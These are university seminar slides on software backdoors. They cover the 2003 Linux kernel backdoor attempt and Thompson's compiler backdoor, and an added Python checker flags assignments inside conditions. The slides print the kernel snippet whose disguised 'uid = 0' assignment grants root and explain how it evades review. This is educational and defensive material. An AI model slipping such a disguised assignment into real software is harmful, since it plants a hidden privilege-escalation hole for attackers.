BACKDOORS in Software
January 2008
Eino Malinen
Seminar on Software Engineering @ University of Turku
Definition and Introduction
• an unwanted software mechanism introduced into part of a system to provide easy access
• the attacker has created the mechanism earlier and wants to use it some time later
• the mechanism can be injected
  • from outside: malware sent through the network
  • on-site: hard-coded into the software
• two examples of actual backdoors follow
Backdoor Attempt in Linux Kernel
• happened in November 2003
• a change in the kernel source file kernel/exit.c
• the person who noticed it first focused on the annoyance of the file having been modified by hand
• peers asked more about the change
Backdoor Attempt in Linux Kernel
• the following piece of code was added:

      if ((options == (__WCLONE|__WALL)) &&
          (current->uid = 0))
              retval = -EINVAL;

• effectively this means that with the flags __WCLONE and __WALL set, the current user gets root permissions: the second operand assigns uid 0 instead of testing for it
• a lax review might read the latter as a comparison (==) instead of an assignment (=)
• the extra parentheses around the assignment avoid the compiler warning
Backdoor Attempt in Linux Kernel
• the attempt came to light because the file in question was under automatic monitoring for modifications
• fellow developers were active enough to ask about the change
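An added example, not part of the original slides: a small Python check that flags a plain assignment inside an if or while condition, the review rule that would have caught the exit.c change even though its extra parentheses silence the compiler's warning. The sample source and the function names are constructed for this demonstration.

```python
import re

# Constructed sample source (not taken from the slides' sources): the exit.c
# condition as submitted, its legitimate comparison form, and two benign
# conditions, one of which uses the common assign-in-while idiom.
SAMPLE_SOURCE = """\
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
if (retval != 0 || count >= 10)
        goto out;
while ((c = getc(fp)) != EOF)
        n++;
"""

# Two-character operators that contain '=' but are comparisons, not assignments.
_COMPARISON = re.compile(r"==|!=|<=|>=")
# A lone '=' once the comparison operators have been blanked out.
_ASSIGNMENT = re.compile(r"(?<![=!<>])=(?!=)")


def _condition_after(text, start):
    """Return the text between the parenthesis at `start` and its match."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    return None  # unbalanced parentheses: nothing to inspect


def find_assignments_in_conditions(source):
    """Return (line_number, condition) for every if/while condition holding
    a plain '=' assignment. Extra parentheses do not hide it from this check."""
    hits = []
    for m in re.finditer(r"\b(?:if|while)\s*\(", source):
        cond = _condition_after(source, m.end() - 1)
        if cond is None:
            continue
        if _ASSIGNMENT.search(_COMPARISON.sub("  ", cond)):
            line = source.count("\n", 0, m.start()) + 1
            hits.append((line, " ".join(cond.split())))
    return hits


if __name__ == "__main__":
    for line, cond in find_assignments_in_conditions(SAMPLE_SOURCE):
        print(f"line {line}: assignment inside condition: {cond}")
```

The while idiom on the last sample line is reported too; the check deliberately leaves it to the reviewer to decide which assignments are legitimate.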
Backdoors in Compilers
• introduced by Ken Thompson in 1984
• prerequisite concepts for a compiler backdoor
  • self-replicating program
    • a program that outputs its own source code
    • also known as a quine
  • "training" a program
    • adding a new feature to a program
    • e.g. teaching the compiler to recognize a new escape sequence
Backdoors in Compilers
• phases of injecting the backdoor into the compiler
  • add a backdoor to the compiler source code
    • it compiles a backdoor into the login command
  • add another backdoor to the compiler source code
    • it inserts itself, as self-replicating code, together with the login backdoor whenever the compiler source code is compiled
Backdoors in Compilers
• the backdoor was tested on a friendly victim
• the disassembler was also rigged so that disassembling the object code fails
Sources
• Jeremy. Linux: Kernel "Back Door" Attempt. http://kerneltrap.org/node/view/1584
• Poulsen. Thwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388
• Thompson. Reflections on Trusting Trust. Communications of the ACM, Vol. 27, Issue 8 (Aug. 1984), pages 761-763
• Skoudis & Zeltser. Malware: Fighting Malicious Code.
• Schneier. Countering "Trusting Trust". http://www.schneier.com/blog/archives/2006/01/countering_trus.html
• Zhang & Paxson. Detecting Backdoors. http://www.icir.org/vern/papers/backdoor/index.html